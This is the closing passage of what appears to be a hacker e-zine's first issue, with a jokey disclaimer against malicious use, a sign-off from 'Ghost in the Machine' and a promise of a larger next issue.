NOTE: all Standard Disclaimers (tm) apply. Also, if you DO use the things found in this file for malicious purposes, please let me know. I'll kick your ass before they lock you up. Well, This should be enough to keep you all busy for a few weeks until the next release. Good luck, and happy hacking. Ghost in the Machine +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CLOSING - Well That concludes Issue 1. It's a bit smaller than I had hoped, But I'm already working on articles for the next issue, so it will hopefully be a bit larger and hopefully even better. Hope you found these files useful, interesting, or at least worth the time it took to read them. gitm